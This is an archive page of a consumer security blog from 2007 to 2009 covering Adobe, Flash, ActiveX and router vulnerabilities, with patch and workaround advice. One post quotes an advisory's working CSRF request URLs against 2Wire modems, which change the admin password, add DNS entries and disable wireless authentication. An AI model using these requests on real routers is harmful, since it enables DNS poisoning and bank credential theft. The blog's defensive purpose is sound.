I have just read security reports about a new critical vulnerability in Adobe's PDF programs, Acrobat and Reader, which is being actively exploited in the wild. This comes on the heels of a large security update that Adobe just released in early December, 2009, which patched those programs for other vulnerabilities. There seems to be no end to exploits targeting Adobe products (PDF programs, Shockwave and Flash).

Adobe announced in their security advisory APSA09-07 that a patch would be released by January 12, 2010, which is coincidentally the next Patch Tuesday for Microsoft users.

Here is a quote from advisory APSA09-07:

"Adobe has confirmed a critical vulnerability in Adobe Reader and Acrobat 9.2 and earlier versions that could cause a crash and potentially allow an attacker to take control of the affected system. There are reports that this vulnerability is being actively exploited in the wild."

Adobe recommends customers use one of the workarounds below until a patch is available.

Customers using Adobe Reader or Acrobat versions 9.2 or 8.1.7 can utilize the Adobe JavaScript Blacklist Framework to prevent this vulnerability. Please refer to the aforementioned TechNote for more information. There is some doubt in security circles that this is really going to be effective.

Or, totally disable JavaScript in Adobe Reader or Acrobat, as follows.

1. Launch Acrobat or Adobe Reader.
2. Select Edit > Preferences
3. Select the JavaScript Category
4. Uncheck the "Enable Acrobat JavaScript" option
5. Click OK

If your version of Windows supports it, enabling "DEP" for Acrobat or Reader limits the potential of the attack to crashing the applications, rather than taking over the computer. It is a recommended step to take.

Be sure to watch for the official patch on January 12, 2010, or sooner. If you have disabled JavaScript in Adobe Acrobat and/or Reader, and wish to start using it again, undo the option listed above after applying the upcoming patch.

Posted by Wiz at 5:22 PM | Permalink

Get Norton 360 Version 6.0 - All-In-One Security. Comprehensive, easy to use, all around protection for your computer, your browsers, your identity and your files! Read about the key features of Norton 360 Version 6.0.

July 25, 2009

There are some new vulnerabilities to be alerted to that are being exploited in the wild right now and may impact you. Some affect Windows computers, while others are cross platform (Linux, Mac, Solaris). Foremost among the vulnerable software are Internet Explorer, Visual Studio components and three Adobe programs.

First off, Microsoft just announced that they will be releasing two out-of-cycle security patches on Tuesday, July 28, 2009. This is very rare for Microsoft, who mainly stick to a Patch Tuesday happening just once a month schedule. The two vulnerabilities are being actively exploited in the wild and cannot wait until August 11 to be fixed. Too many PCs would be compromised by then.

If you have followed Microsoft's recommendation and set your Windows PCs to download and install Windows Updates Automatically, you will receive them sometime during the day of July 28, 2009, depending on where you are located. For folks living in the Eastern US time zone these updates will probably show up around 2 PM. If you are going to be away from your PC during that afternoon you should save any work in progress, because Windows Update will reboot your computer without interaction, if required to install those updates, after popping up a pending shutdown alert. If you aren't there to dismiss that alert your PC will be automatically rebooted to finish installing these critical patches.

Adobe has three products being exploited by cyber criminals this week. They are Adobe's Acrobat, Reader and Flash Player. This time the exploit lies in the way in which Adobe Reader and Acrobat are set to automatically run embedded Flash code whern a person opens a .pdf document (pdf = Portable Document Format) in any current version of Reader or Acrobat. In case you were wondering, Acrobat is an expensive program used to create pdf documents. Reader opens them for reading and printing. Flash is active content for interactive forms and video presentations on web pages, or for embedding into pdf files. YouTube videos are encoded using Adobe Flash and are viewed in Flash Player.

Adobe will be releasing patches on two days this month. An update for Flash Player v9 and v10 for Windows, Macintosh, and Linux will be available by July 30, 2009. They expect to provide an update for Adobe Reader and Acrobat v9.1.2 for Windows, Macintosh and UNIX by July 31, 2009. While you patiently wait for those patches you can protect you computers from getting hacked from hostile pdf documents by applying two officially recommended workarounds.

UPDATE:
August 2, 2009

Both Microsoft and Adobe did release the promised, out-of-band, critical updates, fixing the reported vulnerabilities in Microsoft's Internet Explorer and Visual Studio ATL and in Adobe's Flash, Reader and Acrobat. If you have not already done so, please run the Secunia Online Software Inspector, to see what insecure software is installed on your computers. Download links are provided in its report.

Note: If you are a programmer and have written any code that utilizes the Microsoft Visual Studio ATL, you may need to make changes to get those controls working again. See this MSDN page for more information about how the security update of 7/28/09 will impact your code.

Details about the Adobe vulnerabilities and their workarounds are in my extended content.

Continue reading "Microsoft and Adobe to release out-of-band patches" »

Posted by Wiz at 6:29 PM | Permalink

Get Norton 360 Version 6.0 - All-In-One Security. Comprehensive, easy to use, all around protection for your computer, your browsers, your identity and your files! Read about the key features of Norton 360 Version 6.0.

There is a new vulnerability in a Microsoft ActiveX (DirectShow) control that is currently being exploited in the Wild, to take over or infect vulnerable machines. Also, the related MPEG2TuneRequest ActiveX Control Object is being exploited.

Microsoft Security Advisory (972890), published on July 06, 2009, describes the vulnerability as affecting users of various versions of Internet Explorer (web browsers), in such a way that code execution occurs from remote locations and may not require any user intervention at all. This is typical of "drive-by" ActiveX exploits. As a result, an attacker who successfully exploited this vulnerability could gain the same user rights as the local user. Since most Windows XP users operate with full Administrator privileges, their machines could be taken over completely and without notice.

This newly-exploited vulnerability is the second unpatched DirectShow bug to surface in the last five weeks. Workarounds for the new DirectShow vulnerability are listed in my extended content.

This security advisory is like the horse that is out of the stable. This vulnerability that was only acknowledged on Monday, July 6 has already been distributed over the past weekend via compromised websites with injected redirection codes.The compromised sites lead to a handful of payload sites hosting the exploit code which targets msvidctl.dll - an ActiveX control for streaming video. I have read several reports ^{1 2 3} about a recent flurry of website injection compromises that started by targeting mostly Chinese servers, but has since moved to attack any server anywhere that responds to the code injection attempt.

Each compromised website acts as a zombie redirector in a botnet of websites. The payloads are hosted on Asian and Former Soviet Union servers, where take-downs of malicious sites are slow at best, and non-existent in many instances. The injected script re-routes visitors of those websites to a malicious exploit-laden site, which in turn downloads and launches a multi-exploit hacker toolkit that includes the DirectShow attack code and the KillAV malware (which tries to kill your anti virus program). DirectShow is a part of Windows' DirectX graphics infrastructure. Windows XP and Server 2003 computers appear to be the only ones directly vulnerable to this DirectShow ActiveX attack. However, Vista users who operate as Administrators, with UAC turned off are also at high risk.

Continue reading "Vulnerability in Microsoft Video ActiveX Control being exploited" »

Posted by Wiz at 6:16 PM | Permalink

Get Norton 360 Version 6.0 - All-In-One Security. Comprehensive, easy to use, all around protection for your computer, your browsers, your identity and your files! Read about the key features of Norton 360 Version 6.0.

Here is a summary of this week's vulnerabilities and exploits in the wild, as reported by Secunia, Websense and other security firms. Actually, this has been a quieter week than most.

Websense has been following a website code injection event they named the "Nine Ball Mass Injection," which is a follow-up to the "Beladen" and "Gumblar" mass injection attacks last month This is a situation where cyber criminals exploit vulnerable web application scripts that have not been secured by the webmasters who operate those websites. Too many webmasters use free scripts that are rarely, if ever updated to patch announced vulnerabilities. Hackers send out automatic scripts (a.k.a. robots, spiders) that try to upload hostile files to any website they come across. Once they find an unpatched point of entry they are able to alter the codes on any web pages (usually the home page) they want. In the past, hackers would deface home pages with gibberish or slogans for their causes. Now, it is criminals who sneak in dangerous hidden codes that redirect innocent visitors to hostile websites, where malware is attempted to be downloaded to the victims' computers. Most are successful, because most people do not, or cannot keep up with patches released by every vendor of the add-ons and plug-ins used by their browsers.

Most of the malware being downloaded by the Nine Ball and similar exploits is fake security applications that pretend to scan you computer, announce so many threats found, then demand payment to remove those threats. These are tandem malware programs, with part one being the fake alerts and part two being the fake remover. After you pay to unlock the remover, it only removes the alerts its sister placed there in the first place. You will have submitted your credit or debit card information to cyber criminals in the Former Soviet Union and can expect to have your accounts drained shortly.

The rest of this weeks vulnerabilities and exploits are in my extended comments.

Continue reading "Weekly roundup of vulnerabilities and exploits in the wild" »

Posted by Wiz at 2:42 PM | Permalink

Get Norton 360 Version 6.0 - All-In-One Security. Comprehensive, easy to use, all around protection for your computer, your browsers, your identity and your files! Read about the key features of Norton 360 Version 6.0.

Takeaway

This week has been a headache for the major web software vendors, especially Red Hat Linux and other distributions. Windows users are being targeted by highly critical vulnerabilities in Winamp and Quicktime. Mac users are affected by a flaw in Calendar Objects for Java. So far, between May 18 and 22 there have been at least 85 vulnerability advisories reported by the security investigators at Secunia, 17 of which are rated as "highly critical." I counted at least 7 SQL flaws that can be or are being exploited to inject hostile redirection codes into websites.

Windows Vulnerabilities

On 5/18 /09, Secunia reported an unpatched flaw in Winamp 5.x that can be exploited by malicious people to potentially compromise a user's system. The vulnerability is caused due to the use of vulnerable libsndfile code. Successful exploitation of the vulnerabilities may allow execution of arbitrary code. The vulnerability is confirmed in version 5.552, but other versions may also be affected. Since this vulnerability in currently unpatched, the best advise is to not open untrusted files in Winamp.

A highly critical vulnerability was reported in Apple QuickTime 7.x, on 5/22/09, which can be exploited by malicious people to compromise a user's system. The vulnerability is caused due to an error in the processing of "0x77" tags within PICT images, which can be exploited to cause a heap-based buffer overflow when the user opens a specially crafted PICT image or visits a malicious web site. This flaw is new and unpatched, so you are advised to not browse untrusted web sites, or open PICT files from untrusted sources.

Read about the vulnerabilities affecting other operating systems and software in my extended comments.

Continue reading "Vulnerabilities roundup for May 18 - 22, 2009" »

Posted by Wiz at 5:24 PM | Permalink

Get Norton 360 Version 6.0 - All-In-One Security. Comprehensive, easy to use, all around protection for your computer, your browsers, your identity and your files! Read about the key features of Norton 360 Version 6.0.

New zero-day JavaScript exploit targets Adobe Reader
04/29/2009:

Adobe Systems Inc. confirmed on Tuesday, April 28, 2009, that it is investigating reports that its popular PDF viewing software, Adobe Reader, contains another critical vulnerability.

A hacker using the handle "Arr1val" has discovered and published two zero day exploitable vulnerabilities in the Adobe Reader and Acrobat. Both of them make it possible for an attacker to execute arbitrary code on systems with the affected products installed, by tricking users into opening a maliciously crafted PDF file. He tested them first using Linux, on Adobe Readers 8.14 and 9.1, which are the most recent versions. Later on he retested it using Windows and Mac computers are found the same vulnerability exists under those platforms. Interestingly, Adobe only recently released those versions to fix several other critical vulnerabilities in its Reader and Acrobat programs.

The new bug was first disclosed Monday (4/27/09) on the SecurityFocus website, which published advisory 34736 containing a link to proof-of-concept attack code. The advisory is titled: "Adobe Reader 'getAnnots()' JavaScript Function Remote Code Execution Vulnerability." An attacker can exploit this issue to execute arbitrary code with the privileges of the user running the application, according to the advisory.

According to Adobe, all versions of their Reader, even the most up-to-date versions, Reader 9.1 and Reader 8.1.4, are vulnerable. The affected platforms include at least Windows, Mac and Linux and Unix.

This information has been posted on the Adobe website, by the Adobe Product Security Incident Response Team (PSIRT), in an article titled: Update on Adobe Reader Issue

"This is an update on the Adobe Reader vulnerability first discussed on the Adobe PSIRT blog on April 27 (“Potential Adobe Reader Issue”). All currently supported shipping versions of Adobe Reader and Acrobat (Adobe Reader and Acrobat 9.1, 8.1.4, and 7.1.1 and earlier versions) are vulnerable to this issue. Adobe plans to provide updates for all supported versions for all platforms (Windows, Macintosh and Unix) to resolve this issue. We are working on a development schedule for these updates and will post a timeline as soon as possible. We are currently not aware of any reports of exploits in the wild for this issue. To mitigate the issue disable JavaScript in Adobe Reader and Acrobat using the following instructions below:"

1. Launch Acrobat or Adobe Reader.


2. Select Edit>Preferences


3. Select the JavaScript Category


4. Uncheck the ‘Enable Acrobat JavaScript’ option


5. Click OK

I will publish additional details as they become available. You should also check the Adobe website and blog for updates and use the built-in Check for Updates function found under the Help menu, on all current versions of Adobe Reader.

Note, that users who operate with less that Administrator privileges would be less impacted if they came upon or were lured to a website containing exploit codes for this vulnerability, or any other.

Posted by Wiz at 1:46 PM | Permalink

Get Norton 360 Version 6.0 - All-In-One Security. Comprehensive, easy to use, all around protection for your computer, your browsers, your identity and your files! Read about the key features of Norton 360 Version 6.0.

From the security desk of Wiz Feinberg
March 11, 2009

On March 9 and 11, Foxit then Adobe released patched, updated versions of their PDF readers, responding to critical vulnerabilities, like the JBIG exploit, currently being exploited in the wild. Until the Foxit patch was announced on the 9th, many people believed that it was a safe alternative to the Adobe Reader. Not so. The Adobe exploits are targeting all Reader and Acrobat versions 7, through 9.0.

Foxit has patched three critical vulnerabilities with version 3.0 Build 1506. You can download the latest patched Foxit PDF Reader here. Interestingly, Foxit was only notified about these exploitable vulnerabilities a few weeks ago, in mid-February and were able to push out a patch in a short time.

Adobe, on the other hand, has been aware of the vulnerabilities in it's PDF Reader and Acrobat PDF encoder for three months (since early January 2009) and just today released the patch. When these security concerns were publicized Adobe recommended disabling JavaScript and browser plug-in functions in the Adobe Reader and in Acrobat. However, it was later demonstrated in a lab test at Secunia that Reader and Acrobat are still exploitable with these functions disabled. The patched versions released on March 11 finally plugs the holes that allow these exploits to occur. JavaScript and displaying a pdf in your browser can now be re-enabled, after you upgrade to Adobe Reader and Acrobat 9.1. Older Readers version 7 and 8 x will be patched on March 18, 2009.

You can download the current version of Adobe Reader here. This Adobe page has links to patch your version of Adobe Acrobat.

Adobe has published a security bulletin about the vulnerabilities affecting its Reader and Acrobat software, with the dates the vulnerabilities were announced and the release dates for the patches. This page goes far back and shows how they have responded to exploitable weaknesses for years.

If you missed the news, Adobe also released a patched version of Adobe Flash Player, on February 24, 2009. Adobe recommends all users of Adobe Flash Player 10.0.12.36 and earlier versions upgrade to the newest version 10.0.22.87 by downloading it from the Player Download Center, or by using the auto-update mechanism within the product when prompted.

The risk of browsing the Internet or opening emails containing links to or attachments containing rigged Flash and PDF files, without being fully patched against the exploit codes, is total system compromise. There have been malicious Flash banner ads released through some affiliate ad services that are capable of redirecting your browser to a hostile web server, where it will attempt to forceably and invisibly download exploit codes to your computer, if you have installed a vulnerable version of Flash Player, or Adobe (PDF) Reader or Acrobat.

You can scan your PCs online at Secunia.com, using their Online Software Inspector tool. It requires Java to operate and will report on any missing Windows patches, as well as any left over insecure versions of third party applications, like Flash, Reader and Java. It provides direct download links to obtain the latest patched versions, plus shows you the exact path to the old, exploitable versions still installed on your PC. I use it and recommend you do so every week, say on Tuesday evenings (after Windows Updates are released on Patch Tuesdays). It usually takes under a minute to complete the online scans. You must uninstall old software and install the updates yourself.

Posted by Wiz at 8:32 PM | Permalink

Get Norton 360 Version 6.0 - All-In-One Security. Comprehensive, easy to use, all around protection for your computer, your browsers, your identity and your files! Read about the key features of Norton 360 Version 6.0.

Adobe Flash Player (formerly Macromedia Flash) is a browser plug-in/add-on module that displays active "Flash" multimedia content in web pages. This active content can include audio, video, hyperlinks, and JavaScript. It is thought that Flash Player is installed in over 90% of the personal computers that connect to the Internet. For instance, if you watch YouTube videos on your PC you are doing so via a Flash Player plug-in. Got the picture? So do the bad guys, who are always looking for ways to hijack your PC through Flash vulnerabilities! Some of these vulnerabilities include the ability to forcefully redirect a browser to a hostile file location and download it without the user's knowledge, then execute it. This is currently being exploited by means of specially crafted Flash advertisements made by cyber criminals.

On February 24, 2009, Adobe Flash Player was patched to fix 5 critical vulnerabilities that could allow complete system takeover, without user interaction. This time it not only affects Windows computers, but also Mac OS X and Linux PCs. The new, patched version of Adobe Flash Player is 10.0.22.87. This patch must also be installed into the Adobe CS 4 Flash creation program, if you are a Flash content developer.

Here is a summary of the security advisory published on February 24, 2009...

Adobe Security Advisory APSB09-01

"A potential vulnerability has been identified in Adobe Flash Player 10.0.12.36 and earlier that could allow an attacker who successfully exploits this potential vulnerability to take control of the affected system. A malicious SWF must be loaded in Flash Player by the user for an attacker to exploit this potential vulnerability. Additional vulnerabilities have been addressed in this update. Adobe recommends users update to the most current version of Flash Player available for their platform."

Affected software versions:
Adobe Flash Player 10.0.12.36 and earlier (Adobe Flash Player 10.0.15.3 and earlier for Linux).

Adobe recommends all users of Adobe Flash Player 10.0.12.36 and earlier versions upgrade to the newest version 10.0.22.87 by downloading it from the Player Download Center, or by using the auto-update mechanism within the product when prompted. Only download the Flash Player and its updates from adobe.com! Cyber criminals try to fool people into installing fake Flash players as a means of distributing Botnet Trojans and fake anti virus products.

For users who cannot update to Flash Player 10, Adobe has developed a patched version of Flash Player 9, Flash Player 9.0.159.0, which you can download from this link.

If you use more than one browser you must install the update in each browser separately, by visiting the above-listed download page, as different browsers need different types of Flash. For instance, Interenet Explorer uses an ActiveX version of Flash Player, while Firefox, Opera and others use a browser plug-in version. After you install the update you must restart your browser for the update to "take." This flushes out the [previous version and registers the new one.

After restarting your browser you should go to the About Flash Player page to ensure that you now have the current version installed. I also recommend that you use the Secunia Online Software Inspector scanner to make sure all of your browser's add-ons are up to date, as well as your operating system patches.

I would like to close by stating that users who operate their computers with less than administrator privileges are less at risk from these browser plug-in exploits. Read my recent article about how running your PC with reduced user privileges stops up to 92% of malware infections and its related, linked-to articles.

Posted by Wiz at 1:52 PM | Permalink

Get Norton 360 Version 6.0 - All-In-One Security. Comprehensive, easy to use, all around protection for your computer, your browsers, your identity and your files! Read about the key features of Norton 360 Version 6.0.

This is a follow up to two articles I published earlier this year. They both dealt with an attack against 2Wire brand modems used in Mexico, with the first article titled "Hackers exploit vulnerability in 2Wire modems to steal Mexican bank accounts" and the latter titled "2Wire Modem DNS Poisoning Attack Returns to Mexico." In both of those articles I urged owners of the affected models of these and other brands of modem/router combinations to change the default administrator password, which is blank be default. By creating a personal password the scripted attacks described in these articles will fail, as they rely upon a blank, or known default password to gain access to the configurations pages.

Yesterday I learned about a new means being tested by security cracking professionals and hackers, whereby a 2Wire modem can still be hacked after a personal administrator password has been applied to it! The exploit may already be in the wild, on MySpace, Facebook, or other popular social networking websites, or soon will be. The technique they are using is not brute force, nor a dictionary attack, in fact, it is what I'd call a chance opportunity attack vector. The way it works is by launching a script aimed at your router's GUI configuration page, in your browser, hoping that you have recently logged into the router, in the same browser session. If you have been logged into your router and not closed that browser in the interim, and you happen upon a web page that contains the JavaScript exploit code, your router can be taken over! This happens because having logged in once, and not logged out, you are still authenticated by the router and anything you want to change is only a mouse click, or code string away. No further challenges would appear in most consumer modem/routers or wireless routers. After gaining access to the configuration utility a hacker's code can change your router's administrator password, poison the DNS tables (to redirect you to phishing websites), enable remote administration, download hostile firmware, and anything else the hacker can think of. You wouldn't be any the wiser until you closed that browser, then tried to log in again, only to find that your password was incorrect.

Should this type of attack happen to you and you find yourself locked out of your router, or modem/router configuration page, don't panic yet. The first thing you should do is reset the router to its default state. Most routers have a small hole on the back, where you can insert the tip of a pen, pencil, or hair pin and hold it in for a half minute, or so, then power off, hold it in again, then release the button and power the unit back on. After the device stabilizes you should be back to factory default settings. Close any open browsers to clear any possible hostile sessions and empty your browser's cache, or Temporary Internet Files. Next, open a new browser window and enter the web interface for your router and change the administrator password, disable remote administration and UPnP, then, if at all possible, change the router's IP address. Do not open any other web pages yet; they could have hostile codes embedded without the owner's knowledge.

The last item I mentioned is important because many router or modem attacks have hardcoded IP addresses in the scripts, which will target specific brands of routers. Some will target the address 192.168.1.254, used by 2-wire and certain other routers. If your router will allow you to alter its IP address, do so and save the changes, then log in using the new IP. For instance, if the default IP is 192.168.1.254, change it to something like 192.168.2.253. Be creative here. As long as you change it to a valid LAN IP, in the 192.168 range, it should accept it. When you restart the router, after saving the change, you will probably have to release and renew the computer's IP address, to get a new one from the changed router. To do this open a command prompt. Go to Start > Run and type in CMD then press the Enter key. A black command window should open, with a blinking cursor after a text path ending in a > symbol.

At the blinking cursor type the following commands:

IPCONFIG /RELEASE
press Enter
IPCONFIG /RENEW
press Enter

The last command will show your new computer's IP address as well as the IP of the gateway, which is your router (or modem/router). The gateway IP should be the same as the one you just assigned to your router.

Go back to your browser and try to log into the router again, using the new IP address you assigned to it. You should have to type in your user name and password to get authenticated. Once you are successful and have checked everything that needs checking, close that browser. From henceforth, until all of the major router manufacturers update their firmware to force you to type your old password before changing it, always close all browsers after visiting the router's web interface. Empty your browser's cache before surfing to any other websites, just in case they have been compromised with hostile codes aimed at your router.

If you have visited your online bank, or other financial institution, contact them as soon as possible to put a fraud watch on your account. Then, after securing your (modem) router, log in again to these websites and change you passwords. Hopefully, you will notice the problem with the router before the hackers receive your login details and empty your accounts.

Make it a point to visit your router/modem-router's manufacturer's website to look for new firmware and install it when it becomes available. If you do not know how to do this call your broadband service provider, who supplied the router, and ask them what they are doing to safeguard their routers. They may offer a flash upgrade on demand and may even do it without notifying you first. If that does occur, your personal settings and administrator password may have been reset to default again, along with the IP address you changed. This is typical for firmware updates, but I can't say for sure that you exact model will get reset completely by an upgrade. Just write down everything you know about the router's login and IP address, or save the configuration file after you have everything where you want it, and import it after you flash the firmware. Always verify your settings and make sure you are able to connect to the net, before closing out the router interface. Exit all browser windows afterward and clear the cache/Temporary Internet Files before starting to surf. I have detailed instructions in the extended comments below, for automatically clearing your browser's cache, upon closing all browser windows.

Continue reading "Routers with passwords still vulnerable to hack attacks" »

Posted by Wiz at 1:30 PM | Permalink

Get Norton 360 Version 6.0 - All-In-One Security. Comprehensive, easy to use, all around protection for your computer, your browsers, your identity and your files! Read about the key features of Norton 360 Version 6.0.

On January 13, 2008, I published an article warning owners of certain 2Wire branded DSL modems about a DNS poisoning attack that was ongoing against Mexican banking customers. That attack took advantage of the unfortunate fact that many DSL Internet customers receiving 2Wire modems have not created a unique administrator password to protect their modems from scripted attacks. In the January attacks, spam email messages were sent specifically to Mexican DSL customers, pretending to contain a link to a video that would be of interest to those recipients. Unbeknownst to the recipients, merely opening these messages triggered the running of a script that targeted 2Wire modems with codes that changed the destination URL of the Banamex online bank.

In my January article about this DNS poisoning attack I strongly recommended that all owners of these, and other broadband modems should immediately setup a unique password for the Administrator login to those modems. I also urged them to disable Remote Administration. I should add disabling UPnP to the list of options that will help secure these modems. Apparently, not enough users read and heeded my advice, because I have just learned that a second round of spam attacks has been launched against the very same people, using the same bank in Mexico!

The new round of attacks that is currently underway is again arriving via spammed email messages. This time, though, the email messages are disguised to trick users into thinking that they have received an e-card from Gusanito.com, a popular Mexican eCard Web site. Once a user clicks on the link where the supposed postcard can be viewed, he or she is then directed to a spoofed Gusanito page. That web page loads a couple of Flash controls, including a malicious one that modifies the 2wire modem localhost table. This routine effectively redirects users to a fraudulent site whenever they attempt to access pages related to Banamex.com. Because the spoofed pages so closely resemble the real bank's website, most users wouldn't realize that they were being scammed, until they tried to pay a bill with, or withdraw, money, which they no longer had in their bank accounts.

This DNS poisoning/Phishing technique has a name: "Drive-by Pharming." It is now proving to be a successful attack vector and will certainly be deployed against other 2Wire Modem users in other Countries. I again strongly urge broadband modem users to secure their modems by creating a good, personal Administrator password, plus disabling unnecessary, exploitable services, like remote administration and UPnP. Read my previous article about the exploiting of 2Wire modems and apply the pointers in it to reset and secure your modems.

This new threat was reported by Trend Micro, on their security alert blog. For its part, Trend Micro will detect the malicious .SWF file as SWF_ADHIJACK.D. All related malicious URLs have also been blocked by Trend Micro Web Threat Protection.

Posted by Wiz at 1:12 PM | Permalink

Get Norton 360 Version 6.0 - All-In-One Security. Comprehensive, easy to use, all around protection for your computer, your browsers, your identity and your files! Read about the key features of Norton 360 Version 6.0.

In a recent security alert, found on several high profile security websites, it has been revealed that hackers, in parts unknown, are exploiting vulnerabilities in certain models of the 2Wire brand of DSL modems, to steal bank accounts - in Mexico. These modems are also in use in the US, so don't get smug about this happening in Mexico only. That is probably a test run by the hackers, before hitting the US based modems.

The modus operandi of this attack begins with a spammed email that is rigged with hidden codes that are embedded in an image tag, plus a link to view a hostile video, where another piece of malware will try to install itself (TROJ_QHOST.FX). People who don't have the targeted modem won't be affected directly by these codes - this time. On the other hand, people who do have these modems and have not created a personal password for the modem's administrator login, will have these hidden codes passed directly to it. The codes will poison the DNS entry for banamex.com, which is the largest bank in Mexico. This DNS poisoning will automatically redirect all requests for banamex.com to a look-alike phishing website, where, when people login to their account, that login information will be added to the database owned by the criminals behind this exploit. These people will have their accounts emptied, unless they realize that they've been duped before the hackers get to their money (not likely).

Because this attack involves poisoning the DNS entries for the bank's website, in the modem itself, even typing banamex.com — which is the legitimate, fully-qualified domain name for this bank — leads to the fraudulent site instead. This is the same type of exploit that occurs when spyware poisons a computer's HOSTS file, to redirect specific requests to a hostile address. This exploit occurs invisibly for users of the affected modems who have not changed the default administrator password, which is null (none set). If they have created a personal password this exploit will fail. About 2 million of the affected modems have been shipped to customers in Mexico, all without an administrator password set. It is up to the recipients to create an administrator password.

This is a known, unpatched exploit, that was first reported on August 17, 2007. It is known as an "xslt Cross-site request forgery" (CSRF) vulnerability, which affects 2wire modem/router models 1701HG, 1800HW, and 2071, with 3.17.5, 3.7.1, and 5.29.51 software. It allows remote attackers to create DNS mappings as administrators, and conduct DNS poisoning attacks, via the NAME and ADDR parameters. That demonstrates the importance of changing the default modem password to one that is not easily guessed. If you have one of these modems and have not already created a strong administrator password, do so as soon as possible!

Background
-------------
This is the most popular router in Mexico and the default installation from the ISP has no system password.

Vulnerability
----------------
It is possible to send a request to the router that will modify its configuration.

It does not validate POST, or Referer or Anything, unless the administrator password has been set by the customer

Exploit
----------------
The client PC sends a request to the router with the configuration changes and they are set instantly.

[examples]

Set a password (NewPassword):
http://192.168.1.254/xslt?PAGE=A05_POST&THISPAGE=A05&NEXTPAGE=A05_POST&ENABLE_PASS=on&PASSWORD=NewPassword&PASSWORD_CONF=NewPassword

Add names to the DNS ( 172.16.32.64 www.example.com):
http://192.168.1.254/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAM
E=www.example.com&ADDR=172.16.32.64

Disable Wireless Authentication
http://192.168.1.254/xslt?PAGE=C05_POST&THISPAGE=C05&NEXTPAGE=C05_POST&N
AME=encrypt_enabled&VALUE=0

Set Dynamic DNS
http://192.168.1.254/xslt?PAGE=J05_POST&THISPAGE=J05&NEXTPAGE=J05_POST&I
P_DYNAMIC=TRUE

Also, disable the Firewall, reset the device, etc.

Solution
----------------
To undo the redirect to this phishing website you must reset your 2wire modem to its factory default state. Warning: This will wipe out all saved rules and your login credentials! Have your DSL user name and password ready to input into the modem, after you reset it, or you will not be able to get back onto the Internet.

If your modem has a small hole, with a reset button on the back, or bottom, insert a paper clip or ballpoint pen into the hole, push it against the recessed button and hold it in for about 2 minutes, with the power on. After two minutes let go of the button, wait about ten seconds, then, unplug the power to the modem for another two minutes. Plug it back in and let it stabilize. You will have to input your login credentials to get logged onto the DSL service. To do so, open your browser and go to this address: http://gateway.2wire.net/ . You can also access the modem/router, if has no other routers between it and your computer, by typing in: http://192.168.1.254, where you can input your login credentials.

If your modem does not have a reset button you can reset it electronically, by using this method. Open your web browser and type this address into the address/location bar: http://gateway.2wire.net/management or http://192.168.1.254/mdc . On that page you can perform administrator password creation and reset the modem to it's default state (under Troubleshooting, click on: RESET TO FACTORY SETTINGS).

After you reset the modem to factory settings and input your login credentials, log back onto the management page and click on "Run Setup Wizard, " where you can create a strong administrator password and disable unnecessary features, like remote administration, to prevent this type of exploit from repeating itself.

Sources:
----------------
http://www.securityfocus.com/archive/1/archive/1/476595/100/0/threaded

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4387

http://xforce.iss.net/xforce/xfdb/36044

http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-4389

http://blog.trendmicro.com/targeted-attack-in-mexico-dns-poisoning-via-modems/

Posted by Wiz at 1:51 PM | Permalink

Get Norton 360 Version 6.0 - All-In-One Security. Comprehensive, easy to use, all around protection for your computer, your browsers, your identity and your files! Read about the key features of Norton 360 Version 6.0.

In a release dated December 3, 2007, but I did not become aware of until today, December 19, 2007, Adobe Systems posted an updated version of the Shockwave Flash ActiveX object for Internet Explorer, and the Flash Player plug-in for Firefox and Opera browsers. The new version is currently listed as 9.0.115.0.

Since this is a security upgrade, to block exploits already in the wild, you should update your Flash player or plug-in, both to maintain your PC's security and for compatibility with Flash videos on YouTube and other websites.

One way to update is simply to visit the Flash download page and download it to your computer, then perform an in-place upgrade. Thankfully, this new installer also uninstalls all old versions of Flash, which previous installers did not do. After downloading the Flash setup file, close all of your browsers (Internet Explorer, Firefox and Opera), run the installer until it completes, then open your browser(s).

The second method to update Flash uses this path (assuming that Windows is installed on the C drive and resides inside the "Windows" directory):

C:\WINDOWS\Downloaded Program Files\Shockwave Flash Object. The version number may be displayed on the right, or not, depending on your "view" settings. If not, right-click on that file and select "Update." If nothing happens you probably already have the current version, but, to be sure, right-click on the file and select Properties. The version number will be available from the Properties box. If your version is out of date, accept the download warnings and allow the signed Flash Installer to download and install the new version. Afterward, hit F5 to refresh to folder view and you should see the newer version number, for the flash file (or right-click and view it's "Properties" to see the version).

Failure to update to the current version of Flash player/plug-in may limit your ability to view Flash videos and leave you at risk of exploitation, should you try to view a malware infected Flash presentation.

You can also obtain information about any insecure versions of Flash or other common applications, by running the Secunia Software Inspector, from your browser. See my blog entry from earlier today, for more details about this tool.

Posted by Wiz at 4:03 PM | Permalink

Get Norton 360 Version 6.0 - All-In-One Security. Comprehensive, easy to use, all around protection for your computer, your browsers, your identity and your files! Read about the key features of Norton 360 Version 6.0.

A newly discovered critical vulnerability has been reported by Symantec, the makers of Norton security software products. A design error in an ActiveX control used by Norton AntiVirus could potentially be exploited by a malicious web site. A successful exploit could lead to remote code execution!

Norton has already issued an out-of-cycle patch that can be installed by running Live Update manually. Norton product users who normally run manual LiveUpdate should already have this update. However, to ensure all available updates have been properly installed, run manual LiveUpdate as follows:

Open any installed Norton product from either your Start Menu > Programs, or from the Windows System Tray icon;
Click LiveUpdate;
Run LiveUpdate until all available product updates are downloaded and installed;
A system reboot may be required, depending on the existing patch level of the affected product

The affected products include:
Norton AntiVirus 2005 and 2006
Norton Internet Security 2005 and 2006
Norton System Works 2005 and 2006

Note: The Norton 2007 product line and Symantec enterprise products, including Symantec Client Security and Symantec AntiVirus Corporate Edition are not affected by this issue.

Continue reading "Critical vulnerability found in multiple Norton products! Patch Available Now" »

Posted by Wiz at 12:25 PM | Permalink

Get Norton 360 Version 6.0 - All-In-One Security. Comprehensive, easy to use, all around protection for your computer, your browsers, your identity and your files! Read about the key features of Norton 360 Version 6.0.

Three months ago, in December, 2006, Microsoft was notified about a system vulnerability in the handling of animated cursors, but did nothing about it. Proof of concept code was published demonstrating an exploit vector. This new vulnerability is now being widely exploited to install Trojan malware into fully patched Windows 2000, XP, Server 2003 and Vista systems. All fully patched Windows systems are currently vulnerable.

It is now April 3, 2007, and due to the fact that this unpatched vulnerability is currently being exploited in the wild, Microsoft is going to release an "out-of-cycle" patch for the animated cursor vulnerability, today, April 3, 2007.

